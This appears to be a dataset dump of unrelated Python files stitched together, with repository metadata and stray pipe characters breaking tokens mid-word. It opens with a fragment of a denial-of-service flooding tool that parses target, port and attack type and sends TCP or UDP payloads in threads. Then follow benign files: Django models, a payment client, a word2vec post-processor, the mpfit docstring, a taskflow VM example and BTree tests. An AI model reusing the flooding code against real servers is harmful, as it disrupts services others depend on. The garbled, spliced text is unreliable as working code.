p_option_pos = sys.argv.index('--port')
port = sys.argv[(p_option_pos + 1)]
elif '--port-threading' in sys.argv:
port = 1
else:
error("Error: Port not defined.")
usage()
sys.exit()
pass
if '-t' in sys.argv:
t_option_pos = sys.argv.index('-t')
_type = sys.argv[(t_option_pos + 1)]
elif '--type' in sys.argv:
t_option_pos = sys.argv.index('--type')
_type = sys.argv[(t_option_pos + 1)]
else:
error("Error: Type not defined.")
usage()
sys.exit()
pass
port_threading = False
if '-n' in sys.argv:
n_option_pos = sys.argv.index('-n')
num_threads = int(sys.argv[(n_option_pos + 1)])
elif '--threads' in sys.argv:
n_option_pos = sys.argv.index('--threads')
num_threads = int(sys.argv[(n_option_pos + 1)])
elif '--port-threading' in sys.argv:
port_threading = True
warn("Port threading has been enabled.")
else:
warn("Using only main thread.")
num_threads = 1
pass
if ('--get' or '--GET') in sys.argv:
_rtype = 'get'
pass
elif ('--post' or '--POST') in sys.argv:
_rtype = 'post'
pass
else:
if _type in ('http', 'HTTP'):
warn("HTTP Request method not chosen. Using 'get'")
_rtype = 'get' # for default
pass
_rtype = 'get' # defining the http type is not required.
pass
if '-m' in sys.argv:
m_option_pos = sys.argv.index('-m')
message = sys.argv[(m_option_pos + 1)]
pass
elif '--message' in sys.argv:
m_option_pos = sys.argv.index('--message')
message = sys.argv[(m_option_pos + 1)]
pass
else:
message = 'getrekt'
pass
if ('-v' or '--verbose') in sys.argv:
print("Verbose enabled.")
verbose = True
elif '-v' or '--verbose' not in sys.argv:
verbose = False
pass
pass
except IndexError:
usage()
sys.exit()
except ValueError as v:
if ('-s' or '--server') not in sys.argv:
error("Error: Server not defined.")
usage()
sys.exit()
elif ('-p' or '--port') not in sys.argv:
error("Error: Port not defined.")
usage()
sys.exit()
elif ('-t' or '--type') not in sys.argv:
error("Error: Type not defined.")
usage()
sys.exit()
elif ('-m' or '--message') not in sys.argv:
error("Error: Message not defined.")
usage()
sys.exit()
pass
# if client got this far, then we're in business
server = (str(target), int(port))
attack_type = str(_type)
methods = [ 'udp', 'tcp', 'http',
'UDP', 'TCP', 'HTTP', ]
# print ( "You've chosen to attack: %s:%s :with method: %s!" % (server[0], server[1], attack_type) )
# now we must check input
if int(port) > 65535:
error("Port cannot be above '65535'.")
sys.exit()
pass
if attack_type not in methods:
error("Invalid attack type. '%s' is not valid. Please choose either [ udp, tcp, http ]." % attack_type)
sys.exit()
pass
# define some functions for the actual DoS attack
def sendpacket(_type, sock, data, server='', port=''):
if _type in ('tcp', 'TCP'):
try:
sock.send(b'%s' % data.encode())
return True
pass
except socket.error as e:
error( "Couldn't send payload <!-- Server may be down -->" )
error( "%s" % e )
sock.close()
sys.exit()
pass
elif _type in ('udp', 'UDP'):
try:
sock.sendto(b'%s' % data, (server, port))
return True
# sock.sendto(bytes(data, "utf-8"), (server))
# sock.sendto(b'%s' % data, (server))
pass
except socket.error as e:
error( "Couldn't send payload <!-- Server may be down -->" )
sock.close() # clean close
sys.exit()
pass
pass
def sendpacket_thread(_type, sock, data, server='', port=''):
if _type in ('tcp', 'TCP'):
try:
sock.send(b'%s' % data.encode())
time.sleep(.01) # to not break the pipe
return True
pass
except socket.error as e:
error( "Couldn't send payload <!-- Server may be down -->" )
sock.close()
sys.exit()
pass
pass
def dos_tcp(server, attack_type, message):
warn ( "You've chosen to attack: \033[96m%s\033[93m at port \033[96m%s\033[93m using attack method: \033[96m%s\033[93m." % (server[0], server[1], attack_type) )
warn ( "Attacking \033[96m%s\033[95m:\033[96m%s\033[93m now!" % (server) )
try:
if attack_type in ('tcp' or 'TCP'):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # define a tcp socket
sock.connect(server)
# sock.connect((server))
except socket.error as e:
# print ( e )
error("Cannot connect to \033[96m%s\033[95m:\033[96m%s\033[91m. <!-- Server |
videntity/tweatwell | apps/tips/models.py | Python | gpl-2.0 | 440 | 0.022727 | from django | .db import models
class Tip | (models.Model):
text = models.TextField(max_length=1000)
date = models.DateField(auto_now_add=True)
class Meta:
ordering = ['-date']
def __unicode__(self):
return '%s ' % (self.text)
class CurrentTip(models.Model):
index = models.IntegerField(max_length=4,default=0)
def __unicode__(self):
return '%s ' % (self.index) |
2Checkout/2checkout-python | twocheckout/sale.py | Python | mit | 3,388 | 0.003542 | from api_request import Api
from util import Util
from twocheckout import Twocheckout
class Sale(Twocheckout):
def __init__(self, dict_):
super(self.__class__, self).__init__(dict_)
@classmethod
def find(cls, params=None):
if params is None:
params = dict()
response = cls(Api.call('sales/detail_sale', params))
return response.sale
@classmethod
def list(cls, params=None):
if params is None:
params = dict()
response = cls(Api.call('sales/list_sales', params))
return response.sale_summary
def refund(self, params=None):
if params | is None:
params = dict | ()
if hasattr(self, 'lineitem_id'):
params['lineitem_id'] = self.lineitem_id
url = 'sales/refund_lineitem'
elif hasattr(self, 'invoice_id'):
params['invoice_id'] = self.invoice_id
url = 'sales/refund_invoice'
else:
params['sale_id'] = self.sale_id
url = 'sales/refund_invoice'
return Sale(Api.call(url, params))
def stop(self, params=None):
if params is None:
params = dict()
if hasattr(self, 'lineitem_id'):
params['lineitem_id'] = self.lineitem_id
return Api.call('sales/stop_lineitem_recurring', params)
elif hasattr(self, 'sale_id'):
active_lineitems = Util.active(self)
if dict(active_lineitems):
result = dict()
i = 0
for k, v in active_lineitems.items():
lineitem_id = v
params = {'lineitem_id': lineitem_id}
result[i] = Api.call('sales/stop_lineitem_recurring', params)
i += 1
response = { "response_code": "OK",
"response_message": str(len(result)) + " lineitems stopped successfully"
}
else:
response = {
"response_code": "NOTICE",
"response_message": "No active recurring lineitems"
}
else:
response = { "response_code": "NOTICE",
"response_message": "This method can only be called on a sale or lineitem"
}
return Sale(response)
def active(self):
active_lineitems = Util.active(self)
if dict(active_lineitems):
result = dict()
i = 0
for k, v in active_lineitems.items():
lineitem_id = v
result[i] = lineitem_id
i += 1
response = { "response_code": "ACTIVE",
"response_message": str(len(result)) + " active recurring lineitems"
}
else:
response = {
"response_code": "NOTICE","response_message":
"No active recurring lineitems"
}
return Sale(response)
def comment(self, params=None):
if params is None:
params = dict()
params['sale_id'] = self.sale_id
return Sale(Api.call('sales/create_comment', params))
def ship(self, params=None):
if params is None:
params = dict()
params['sale_id'] = self.sale_id
return Sale(Api.call('sales/mark_shipped', params))
|
SnakeHunt2012/word2vec | post-process/exclusion.py | Python | apache-2.0 | 24,401 | 0.005128 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from re import compile
from copy import copy, deepcopy
from codecs import open
from argparse import ArgumentParser
from itertools import product
DEBUG_FLAG = False
def duration(start, end):
second = (end - start) % 60
minute = (end - start) % 3600 / 60
hour = (end - start) / 3600
return "%d:%02d:%02d" % (hour, minute, second)
def load_brand_dict(dict_file):
brand_set = set()
category_dict = {}
with open(dict_file, 'r') as fd:
for line in fd:
splited_line = line.split()
if len(splited_line) < 2:
continue
category = int(splited_line.pop(0))
brand = " ".join(splited_line)
brand_set.add(brand)
if brand in category_dict:
category_dict[brand].add(category)
else:
category_dict[brand] = set([category])
return brand_set, category_dict
def load_location_dict(tsv_file):
nationality_list = [
"壮族", "藏族", "裕固族", "彝族", "瑶族", "锡伯族", "乌孜别克族", "维吾尔族", "佤族", "土家族",
"土族", "塔塔尔族", "塔吉克族", "水族", "畲族", "撒拉族", "羌族", "普米族", "怒族", "纳西族",
"仫佬族", "苗族", "蒙古族", "门巴族", "毛南族", "满族", "珞巴族", "僳僳族", "黎族", "拉祜族",
"柯尔克孜族", "景颇族", "京族", "基诺族", "回族", "赫哲族", "哈萨克族", "哈尼族", "仡佬族",
"高山族", "鄂温克族", "俄罗斯族", "鄂伦春族", "独龙族", "东乡族", "侗族", "德昂族", "傣族",
"达斡尔族", "朝鲜族", "布依族", "布朗族", "保安族", "白族", "阿昌族", "傈僳族", "汉族", "各族"
]
nationality_list.sort(lambda x, y: cmp(len(x.decode("utf-8")), len(y.decode("utf-8"))), reverse=True)
location_suff | ix_list = []
for natitionality in nationality_list:
location_suffix_list.append(natitionality)
if len(natitionality.decode("utf-8")) > 2:
lo | cation_suffix_list.append(natitionality[:-len("族")])
location_suffix_list = product(location_suffix_list, ["自治区", "自治州", "自治县"])
location_suffix_list = ["".join([a, b]) for a, b in location_suffix_list]
location_suffix_list.extend(["土家族苗族自治县", "依族苗族自治县", "苗族瑶族傣族自治县", "布依族苗族自治州", "回族彝族自治县", "哈尼族彝族傣族自治县", "壮族瑶族自治县", "土家族苗族自治县", "黎族苗族自治县", "苗族侗族自治县", "满族蒙古族自治县", "拉祜族佤族布朗族傣族自治县", "苗族侗族自治州", "土家族苗族自治州", "彝族傣族自治县", "壮族苗族自治州", "黎族苗族自治县", "苗族布依族自治县", "仡佬族苗族自治县", "藏族羌族自治州", "布依族苗族自治州", "土家族苗族自治州", "回族土族自治县", "仡佬族苗族自治县", "彝族回族苗族自治县", "回族土族自治县", "彝族回族自治县", "土家族苗族自治县", "苗族土家族自治县", "蒙古族藏族自治州", "彝族苗族自治县", "保安族东乡族撒拉族自治县", "傣族景颇族自治州", "傣族佤族自治县", "布依族苗族自治县", "哈尼族彝族自治州"])
location_suffix_list.extend(["特别行政区", "省", "市", "县", "区", "镇", "乡", "村"])
location_suffix_list.sort(lambda x, y: cmp(len(x.decode("utf-8")), len(y.decode("utf-8"))), reverse=True)
location_list = []
with open(tsv_file, 'r') as fd:
for row in fd:
splited_row = row.strip().split()
assert len(splited_row) == 3
location_level, location_string, location_dir = splited_row
location_dir = location_dir.split("_")
location_list.append([location_level, location_string, location_dir])
location_dict = dict((location_list[i][1], i) for i in xrange(len(location_list)))
synonymy_map = {}
for location_string in location_dict:
synonymy_map[location_string] = location_string
for location_suffix in location_suffix_list:
if location_string.endswith(location_suffix):
location_synonymy = location_string[:-len(location_suffix)]
if len(location_synonymy.decode("utf-8")) < 2:
break
if location_synonymy in synonymy_map and location_list[location_dict[synonymy_map[location_synonymy]]][0] >= location_list[location_dict[synonymy_map[location_string]]][0]:
break
synonymy_map[location_synonymy] = location_string
break
#for location in synonymy_map:
# if location != synonymy_map[location]:
# print "%s\t->\t%s" % (location, synonymy_map[location])
return location_dict, location_list, synonymy_map
def reduce_set(location_set, location_dict, location_list, synonymy_map):
res_set = set([])
location_set = set(synonymy_map[location_string] for location_string in location_set)
for source_string in location_set:
should_pass = False
for target_string in location_set:
if source_string == target_string:
continue
for target_parent_location in location_list[location_dict[target_string]][2]:
if source_string == target_parent_location:
should_pass = True
break
if should_pass:
break
if not should_pass:
res_set.add(synonymy_map[source_string])
return res_set
def location_judge_relation(query_location_set, bidword_location_set, location_dict, location_list, synonymy_map):
query_location_set = reduce_set(set(synonymy_map[location_string] for location_string in query_location_set), location_dict, location_list, synonymy_map)
bidword_location_set = reduce_set(set(synonymy_map[location_string] for location_string in bidword_location_set), location_dict, location_list, synonymy_map)
for query_location in query_location_set:
found_parent_flag = False
for bidword_location in bidword_location_set:
if query_location == bidword_location:
found_parent_flag = True
break
if synonymy_map[bidword_location] in set(location_list[location_dict[synonymy_map[query_location]]][2]):
found_parent_flag = True
break
if not found_parent_flag:
return False
#if found_parent_flag:
# return True
return True
#return False
def load_school_dict(tsv_file):
school_dict = {}
with open(tsv_file, 'r') as fd:
for row in fd:
splited_row = row.strip().split()
assert len(splited_row) > 0
school_dict[splited_row[0]] = set(splited_row[1:])
school_set = set(school_dict)
synonymy_map = {}
for school in school_set:
synonymy_map[school] = school
for syn_school in school_dict[school]:
if syn_school in synonymy_map:
#raise Exception("%s already in synonymy_map[%s] = %s not %s" % (syn_school, syn_school, synonymy_map[syn_school], school))
continue
synonymy_map[syn_school] = school
return school_set, synonymy_map
def school_judge_relation(query_school_set, bidword_school_set, synonymy_map):
source_set = set()
for school in query_school_set:
source_set.add(synonymy_map[school])
target_set = set()
for school in bidword_school_set:
target_set.add(synonymy_map[school])
return source_set.issubset(target_set)
def stock_judge_relation(query_school_set, bidword_school_set, synonymy_map):
source_set = set()
for school in query_school_set:
source_set.add(synonymy_map[school])
target_set = set()
for school in bidword_school_set:
target_set.add(synonymy_map[school])
return source_set.issubset(target_set)
def load_stock_dict(stock_file):
stock_dict = {}
code_dict = {}
prefix_dict = {} # {A: [((A, B, C), 10010]), ((A, D, E), 10011)]}
with open(stock_file, 'r') as fd:
for line in fd:
splited_line = line.strip().split("\t")
if len(splited_line) != 3:
continue
code, stock_str, stock_seg = splited_line
assert code.isdigit()
if stock_seg not in stock_dict:
stock_dict[stock_seg] = code
if code not in code_dict:
code_dict[code] = stock_seg
for stock in stock_dict:
splited_stock = stock.split()
if splited_stock[0] not in prefix_dict:
prefix_dict[splited_stock[0]] = []
prefix_dict[splited_stock[0]].append((splited_stock, stock_dict[stock]))
return code_dict, stock_dict, prefix_dict
def is_same(list_a, list_b):
if len(list_a) != len(list_b):
return False
for index in range(len(list_a)):
if lis |
neuroneuro15/aspp-test | counter.py | Python | gpl-2.0 | 18 | 0.055556 | print(range | (10)) | |
philrosenfield/ResolvedStellarPops | utils/mpfit/mpfit.py | Python | bsd-3-clause | 93,267 | 0.000729 | """
Perform Levenberg-Marquardt least-squares minimization, based on MINPACK-1.
AUTHORS
The original version of this software, called LMFIT, was written in FORTRAN
as part of the MINPACK-1 package by XXX.
Craig Markwardt converted the FORTRAN code to IDL. The information for the
IDL version is:
Craig B. Markwardt, NASA/GSFC Code 662, Greenbelt, MD 20770
craigm@lheamail.gsfc.nasa.gov
UPDATED VERSIONs can be found on my WEB PAGE:
http://cow.physics.wisc.edu/~craigm/idl/idl.html
Mark Rivers created this Python version from Craig's IDL version.
Mark Rivers, University of Chicago
Building 434A, Argonne National Laboratory
9700 South Cass Avenue, Argonne, IL 60439
rivers@cars.uchicago.edu
Updated versions can be found at http://cars.uchicago.edu/software
Sergey Koposov converted the Mark's Python version from Numeric to numpy
Sergey Koposov, University of Cambridge, Institute of Astronomy,
Madingley road, CB3 0HA, Cambridge, UK
koposov@ast.cam.ac.uk
Updated versions can be found at http://code.google.com/p/astrolibpy/source/browse/trunk/
DESCRIPTION
MPFIT uses the Levenberg-Marquardt technique to solve the
least-squares problem. In its typical use, MPFIT will be used to
fit a user-supplied function (the "model") to user-supplied data
points (the "data") by adjusting a set of parameters. MPFIT is
based upon MINPACK-1 (LMDIF.F) by More' and collaborators.
For example, a researcher may think that a set of observed data
points is best modelled with a Gaussian curve. A Gaussian curve is
parameterized by its mean, standard deviation and normalization.
MPFIT will, within certain constraints, find the set of parameters
which best fits the data. The fit is "best" in the least-squares
sense; that is, the sum of the weighted squared differences between
the model and data is minimized.
The Levenberg-Marquardt technique is a particular strategy for
iteratively searching for the best fit. This particular
implementation is drawn from MINPACK-1 (see NETLIB), and is much faster
and more accurate than the version provided in the Scientific Python package
in Scientific.Functions.LeastSquares.
This version allows upper and lower bounding constraints to be placed on each
parameter, or the parameter can be held fixed.
The user-supplied Python function should return an array of weighted
deviations between model and data. In a typical scientific problem
the residuals should be weighted so that each deviate has a
gaussian sigma of 1.0. If X represents values of the independent
variable, Y represents a measurement for each value of X, and ERR
represents the error in the measurements, then the deviates could
be calculated as follows:
DEVIATES = (Y - F(X)) / ERR
where F is the analytical function representing the model. You are
recommended to use the convenience functions MPFITFUN and
MPFITEXPR, which are driver functions that calculate the deviates
for you. If ERR are the 1-sigma uncertainties in Y, then
TOTAL( DEVIATES^2 )
will be the total chi-squared value. MPFIT will minimize the
chi-square value. The values of X, Y and ERR are passed through
MPFIT to the user-supplied function via the FUNCTKW keyword.
Simple constraints can be placed on parameter values by using the
PARINFO keyword to MPFIT. See below for a description of this
keywor | d.
MPFIT does not perfor | m more general optimization tasks. See TNMIN
instead. MPFIT is customized, based on MINPACK-1, to the
least-squares minimization problem.
USER FUNCTION
The user must define a function which returns the appropriate
values as specified above. The function should return the weighted
deviations between the model and the data. It should also return a status
flag and an optional partial derivative array. For applications which
use finite-difference derivatives -- the default -- the user
function should be declared in the following way:
def myfunct(p, fjac=None, x=None, y=None, err=None)
# Parameter values are passed in "p"
# If fjac==None then partial derivatives should not be
# computed. It will always be None if MPFIT is called with default
# flag.
model = F(x, p)
# Non-negative status value means MPFIT should continue, negative means
# stop the calculation.
status = 0
return([status, (y-model)/err]
See below for applications with analytical derivatives.
The keyword parameters X, Y, and ERR in the example above are
suggestive but not required. Any parameters can be passed to
MYFUNCT by using the functkw keyword to MPFIT. Use MPFITFUN and
MPFITEXPR if you need ideas on how to do that. The function *must*
accept a parameter list, P.
In general there are no restrictions on the number of dimensions in
X, Y or ERR. However the deviates *must* be returned in a
one-dimensional Numeric array of type Float.
User functions may also indicate a fatal error condition using the
status return described above. If status is set to a number between
-15 and -1 then MPFIT will stop the calculation and return to the caller.
ANALYTIC DERIVATIVES
In the search for the best-fit solution, MPFIT by default
calculates derivatives numerically via a finite difference
approximation. The user-supplied function need not calculate the
derivatives explicitly. However, if you desire to compute them
analytically, then the AUTODERIVATIVE=0 keyword must be passed to MPFIT.
As a practical matter, it is often sufficient and even faster to allow
MPFIT to calculate the derivatives numerically, and so
AUTODERIVATIVE=0 is not necessary.
If AUTODERIVATIVE=0 is used then the user function must check the parameter
FJAC, and if FJAC!=None then return the partial derivative array in the
return list.
def myfunct(p, fjac=None, x=None, y=None, err=None)
# Parameter values are passed in "p"
# If FJAC!=None then partial derivatives must be comptuer.
# FJAC contains an array of len(p), where each entry
# is 1 if that parameter is free and 0 if it is fixed.
model = F(x, p)
Non-negative status value means MPFIT should continue, negative means
# stop the calculation.
status = 0
if (dojac):
pderiv = zeros([len(x), len(p)], Float)
for j in range(len(p)):
pderiv[:,j] = FGRAD(x, p, j)
else:
pderiv = None
return([status, (y-model)/err, pderiv]
where FGRAD(x, p, i) is a user function which must compute the
derivative of the model with respect to parameter P[i] at X. When
finite differencing is used for computing derivatives (ie, when
AUTODERIVATIVE=1), or when MPFIT needs only the errors but not the
derivatives the parameter FJAC=None.
Derivatives should be returned in the PDERIV array. PDERIV should be an m x
n array, where m is the number of data points and n is the number
of parameters. dp[i,j] is the derivative at the ith point with
respect to the jth parameter.
The derivatives with respect to fixed parameters are ignored; zero
is an appropriate value to insert for those derivatives. Upon
input to the user function, FJAC is set to a vector with the same
length as P, with a value of 1 for a parameter which is free, and a
value of zero for a parameter which is fixed (and hence no
derivative needs to be calculated).
If the data is higher than one dimensional, then the *last*
dimension should be the parameter dimension. Example: fitting a
50x50 image, "dp" should be 50x50xNPAR.
CONSTRAINING PARAMETER VALUES WITH THE PARINFO KEYWORD
The behavior of MPFIT can be modified with respect to each
parameter to be fitted. A parameter value can be fixed; simple
boundary constraints can be imposed; limitations on the parameter
changes can be imposed; properties of the automatic derivative can
be modified; and parameters can be tied to one another.
These properties are governed by the PARINFO structure, which is
passed as a keyword parameter to MPFIT.
PARINFO should be a list of dictionaries, one l |
openstack/taskflow | taskflow/examples/resume_vm_boot.py | Python | apache-2.0 | 9,636 | 0.000934 | # -*- coding: utf-8 -*-
# Copyright (C) 2013 Yahoo! Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import hashlib
import logging
import os
import random
import sys
import time
logging.basicConfig(level=logging.ERROR)
self_dir = os.path.abspath(os.path.dirname(__file__))
top_dir = os.path.abspath(os.path.join(os.path.dirname(__file__),
os.pardir,
os.pardir))
sys.path.insert(0, top_dir)
sys.path.insert(0, self_dir)
import futurist
from oslo_utils import uuidutils
from taskflow import engines
from taskflow import exceptions as exc
from taskflow.patterns import graph_flow as gf
from taskflow.patterns import linear_flow as lf
from taskflow.persistence import models
from taskflow import task
import example_utils as eu # noqa
# INTRO: These examples show how a hierarchy of flows can be used to create a
# vm in a reliable & resumable manner using taskflow + a miniature version of
# what nova does while booting a vm.
@contextlib.contextmanager
def slow_down(how_long=0.5):
try:
yield how_long
finally:
if len(sys.argv) > 1:
# Only both to do this if user input provided.
print("** Ctrl-c me please!!! **")
time.sleep(how_long)
class PrintText(task.Task):
"""Just inserts some text print outs in a workflow."""
def __init__(self, print_what, no_slow=False):
content_hash = hashlib.md5(print_what.encode('utf-8')).hexdigest()[0:8]
super(PrintText, self).__init__(name="Print: %s" % (content_hash))
self._text = print_what
self._no_slow = no_slow
def execute(self):
if self._no_slow:
eu.print_wrapped(self._text)
else:
with slow_down():
eu.print_wrapped(self._text)
class DefineVMSpec(task.Task):
"""Defines a vm specification to be."""
def __init__(self, name):
super(DefineVMSpec, self).__init__(provides='vm_spec', name=name)
def execute(self):
return {
'type': 'kvm',
'disks': 2,
'vcpu': 1,
'ips': 1,
'volumes': 3,
}
class LocateImages(task.Task):
"""Locates where the vm images are."""
def __init__(self, name):
super(LocateImages, self).__init__(provides='image_locations',
name=name)
def execute(self, vm_spec):
image_locations = {}
for i in range(0, vm_spec['disks']):
url = "http://www.yahoo.com/images/%s" % (i)
image_locations[url] = "/tmp/%s.img" % (i)
return image_locations
class DownloadImages(task.Task):
"""Downloads all the vm images."""
def __init__(self, name):
super(DownloadImages, self).__init__(provides='download_paths',
name=name)
def execute(self, image_locations):
for src, loc in image_locations.items():
with slow_down(1):
print("Downloading from %s => %s" % (src, loc))
return sorted(image_locations.values())
class CreateNetworkTpl(task.Task):
"""Generates the network settings file to be placed in the images."""
SYSCONFIG_CONTENTS = """DEVICE=eth%s
BOOTPROTO=static
IPADDR=%s
ONBOOT=yes"""
def __init__(self, name):
super(CreateNetworkTpl, self).__init__(provides='network_settings',
name=name)
def execute(self, ips):
settings = []
for i, ip in enumerate(ips):
settings.append(self.SYSCONFIG_CONTENTS % (i, ip))
return settings
class AllocateIP(task.Task):
"""Allocates the ips for the given vm."""
def __init__(self, name):
super(AllocateIP, self).__init__(provides='ips', name=name)
def execute(self, vm_spec):
ips = []
for _i in range(0, vm_spec.get('ips', 0)):
ips.append("192.168.0.%s" % (random.randint(1, 254)))
return ips
class WriteNetworkSettings(task.Task):
"""Writes all the network settings into the downloaded images."""
def execute(self, download_paths, network_settings):
for j, path in enumerate(download_paths):
with slow_down(1):
print("Mounting %s to /tmp/%s" % (path, j))
for i, setting in enumerate(network_settings):
filename = ("/tmp/etc/sysconfig/network-scripts/"
"ifcfg-eth%s" % (i))
with slow_down(1):
print("Writing to %s" % (filename))
print(setting)
class BootVM(task.Task):
"""Fires off the vm boot operation."""
def execute(self, vm_spec):
print("Starting vm!")
with slow_down(1):
print("Created: %s" % (vm_spec))
class AllocateVolumes(task.Task):
"""Allocates the volumes for the vm."""
def execute(self, vm_spec):
volumes = []
for i in range(0, vm_spec['volumes']):
with slow_down(1):
volumes.append("/dev/vda%s" % (i + 1))
print("Allocated volume %s" % volumes[-1])
return volumes
class FormatVolumes(task.Task):
"""Formats the volumes for the vm."""
def execute(self, volumes):
for v in volumes:
print("Formatting volume %s" % v)
with slow_down(1):
pass
print("Formatted volume %s" % v)
def create_flow():
# Setup the set of things to do (mini-nova).
flow = lf.Flow("root").add(
PrintText("S | tarting vm creation.", no_slow=True),
lf.Flow('vm-maker').add(
# First create a specification for the final vm to-be.
DefineVMSpec("define_spec"),
# This does all the | image stuff.
gf.Flow("img-maker").add(
LocateImages("locate_images"),
DownloadImages("download_images"),
),
# This does all the network stuff.
gf.Flow("net-maker").add(
AllocateIP("get_my_ips"),
CreateNetworkTpl("fetch_net_settings"),
WriteNetworkSettings("write_net_settings"),
),
# This does all the volume stuff.
gf.Flow("volume-maker").add(
AllocateVolumes("allocate_my_volumes", provides='volumes'),
FormatVolumes("volume_formatter"),
),
# Finally boot it all.
BootVM("boot-it"),
),
# Ya it worked!
PrintText("Finished vm create.", no_slow=True),
PrintText("Instance is running!", no_slow=True))
return flow
eu.print_wrapped("Initializing")
# Setup the persistence & resumption layer.
with eu.get_backend() as backend:
# Try to find a previously passed in tracking id...
try:
book_id, flow_id = sys.argv[2].split("+", 1)
if not uuidutils.is_uuid_like(book_id):
book_id = None
if not uuidutils.is_uuid_like(flow_id):
flow_id = None
except (IndexError, ValueError):
book_id = None
flow_id = None
# Set up how we want our engine to run, serial, parallel...
try:
executor = futurist.GreenThreadPoolExecutor(max_workers=5)
except RuntimeError:
# No eventlet installed, just let the default be used instead.
executor = None
# Create/fetch a logbook that will track the workflows work.
book = None
flow_detail = None
if all([book_id, flow_id]):
# Try to find in a prior logbook and flow detail...
with cont |
firi/appengine-btree | btree/btree_test.py | Python | mit | 26,756 | 0.001644 | """
Tests for the BTrees.
"""
import logging
import unittest
from google.appengine.ext import ndb
from google.appengine.ext import testbed
from google.appengine.datastore import datastore_stub_util
from . import BTree, MultiBTree, MultiBTree2
import internal
class BTreeTestBase(unittest.TestCase):
def setUp(self):
self.testbed = testbed.Testbed()
self.testbed.activate()
self.policy = datastore_stub_util.PseudoRandomHRConsistencyPolicy(probability=0)
self.testbed.init_datastore_v3_stub(consistency_policy=self.policy)
self.testbed.init_memcache_stub()
# Silences the logging messages during the tests
ndb.add_flow_exception(ValueError)
ndb.add_flow_exception(IndexError)
def tearDown(self):
self.testbed.deactivate()
# helper functions
def issorted(l):
return all(l[i] <= l[i+1] for i in xrange(len(l)-1))
def walk_items(tree):
return tree[:]
def walk_keys(tree):
return [item[0] for item in walk_items(tree)]
class BTreeTest(BTreeTestBase):
def validate_tree(self, tree):
"""
Checks if the tree is still valid. That is the ordering is still
correct.
"""
items = tree[:]
keys = [item[0] for item in items]
self.assertTrue(issorted(keys))
def validate_indices(self, tree):
"""
Checks to see if every item in the tree also has a matching index.
"""
items = tree[:]
for item in items:
key = ndb.Key(MultiBTree2, "tree", internal._BTreeIndex, item[2])
index = key.get()
self.assertIsNotNone(index)
self.assertEqual(index.tree_key, item[0])
self.assertEqual(index.tree_value, item[1])
def validate_empty_tree(self, tree):
"""
An empty tree should consist of only two entities, the | tree
itself and the root node. No indices, no other nodes.
"""
first = tree.key
last = | ndb.Key(first.kind(), first.id() + u"\ufffd")
q = ndb.Query(ancestor=first)
q = q.filter(tree.__class__.key < last)
keys = list(q.iter(keys_only=True))
self.assertEqual(keys, [first, tree._make_node_key("root")])
def test_create(self):
tree = BTree.create("tree", 2)
self.assertEqual(tree.tree_size(), 0)
self.assertRaises(ValueError, BTree.create, None, 2)
self.validate_empty_tree(tree)
def test_create_invalid_degree(self):
self.assertRaises(ValueError, BTree.create, "tree", 1)
def test_get_or_create(self):
"""
Tests get_or_create function.
"""
# BTree
tree = BTree.get_or_create("tree", 2)
self.assertTrue(isinstance(tree, BTree))
self.assertEqual(tree.degree, 2)
self.validate_empty_tree(tree)
# MultiBTree
mtree = MultiBTree.get_or_create("mtree", 5)
self.assertTrue(isinstance(mtree, MultiBTree))
self.assertEqual(mtree.degree, 5)
self.validate_empty_tree(mtree)
# MultiBTree2
mtree2 = MultiBTree2.get_or_create("mtree2", 10)
self.assertTrue(isinstance(mtree2, MultiBTree2))
self.assertEqual(mtree2.degree, 10)
self.validate_empty_tree(mtree2)
# Test with a parent entity
parent = ndb.Key('Parent', 'test')
tree_with_parent = BTree.get_or_create('tree-with-parent', 2,
parent=parent)
self.assertEqual(tree_with_parent.key,
ndb.Key('Parent', 'test', 'BTree', 'tree-with-parent'))
# Test get inside a transaction.
def txn():
return BTree.get_or_create("tree", 2)
tree_txn = ndb.transaction(txn)
self.assertEqual(tree, tree_txn)
# Test create inside a transaction
def txn():
return BTree.get_or_create("tree-new", 2, parent=parent)
tree_new = ndb.transaction(txn)
self.assertIsNotNone(tree_new)
# Test invalid degree
self.assertRaises(ValueError, BTree.get_or_create, "tree-invalid", 1)
def test_insert_full_root(self):
t = 5
tree = BTree.create("tree", 5)
for x in reversed(range(2 * t - 1)):
tree.insert(x, str(x))
self.assertEqual(tree.tree_size(), 2 * t - 1)
def test_insert_multiple(self):
"""
Inserts a random sequence of keys, tests ordering.
"""
tree = BTree.create("tree", 2)
seq = [10, 8, 13, 11, 12, 2, 1, 14, 5, 0, 3, 7, 4, 9, 6]
for x in seq:
tree.insert(x, str(x))
self.assertEqual(sorted(seq), walk_keys(tree))
self.assertEqual(tree.tree_size(), len(seq))
def test_insert_duplicate_keys_replaced(self):
tree = BTree.create("tree", 3)
seq = [10, 8, 13, 11, 12, 2, 1, 14, 5, 0, 3, 7, 4, 9, 6]
for x in seq:
tree.insert(x, str(x))
for x in seq:
tree.insert(x, str(2 * x))
self.assertEqual([(x, str(2 * x)) for x in sorted(seq)],
walk_items(tree))
self.assertEqual(tree.tree_size(), len(seq))
def test_insert_delete_single_item(self):
"""Insert and delete a single item."""
tree = BTree.create("tree", 3)
tree.insert(1, "1")
tree.remove(1)
self.assertEqual([], walk_keys(tree))
self.validate_empty_tree(tree)
def test_delete_nonexisting_items(self):
"""Insert and delete a single item."""
tree = BTree.create("tree", 3)
out = tree.remove(234)
self.assertIsNone(out)
def test_insert_two_delete_one(self):
tree = BTree.create("tree", 3)
tree.insert(1, "1")
tree.insert(2, "2")
tree.remove(1)
self.assertEqual([2], walk_keys(tree))
tree = BTree.create("tree", 3)
tree.insert(1, "1")
tree.insert(2, "2")
tree.remove(2)
self.assertEqual([1], walk_keys(tree))
def test_insert_and_delete_all(self):
"""Inserts and removes all items, resulting in an empty tree"""
tree = BTree.create("tree", 3)
seq = list(range(20))
for x in seq:
tree.insert(x, str(x))
for x in seq:
tree.remove(x)
self.assertEqual([], walk_keys(tree))
self.assertEqual(len([]), tree.tree_size())
self.validate_empty_tree(tree)
def test_delete_scenarios(self):
"""Tests various delete scenarios."""
tree = BTree.create("tree", 2)
seq = list(range(25))
for x in seq:
